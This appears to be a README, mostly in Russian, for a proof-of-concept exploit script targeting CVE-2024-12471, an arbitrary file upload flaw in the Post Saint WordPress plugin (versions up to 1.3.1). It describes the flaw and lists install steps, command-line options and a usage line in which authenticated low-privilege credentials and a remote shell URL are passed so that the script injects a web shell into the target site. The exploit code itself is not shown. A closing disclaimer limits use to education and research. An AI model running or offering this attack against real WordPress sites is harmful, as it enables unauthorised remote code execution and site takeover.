
Плагин Post Saint <= 1.3.1 для WordPress — уязвимость произвольной загрузки файлов.
Плагин Post Saint <= 1.3.1 для WordPress — произвольная загрузка файлов
Плагин Post Saint для WordPress (версии до 1.3.1 включительно) уязвим для произвольной загрузки файлов из-за отсутствия проверки прав доступа и валидации типов файлов. Аутентифицированные злоумышленники, имеющие как минимум уровень подписчика, могут использовать эту уязвимость для загрузки произвольных файлов, что потенциально может привести к удаленному выполнению кода.
pip install requests packaging urllib3
CVE-2024-12471 | Post Saint plugin for wordpress Arbitrary File Upload
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-ru REMOTE_URL, --remote_url REMOTE_URL
Remote URL of the shell file to inject
python CVE-2024-12471.py -u <Base URL> -un <Username> -p <Password> -ru <Remote Shell URL>
Этот скрипт предназначен только для образовательных и исследовательских целей. Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых не имеете явного разрешения, незаконно и неэтично.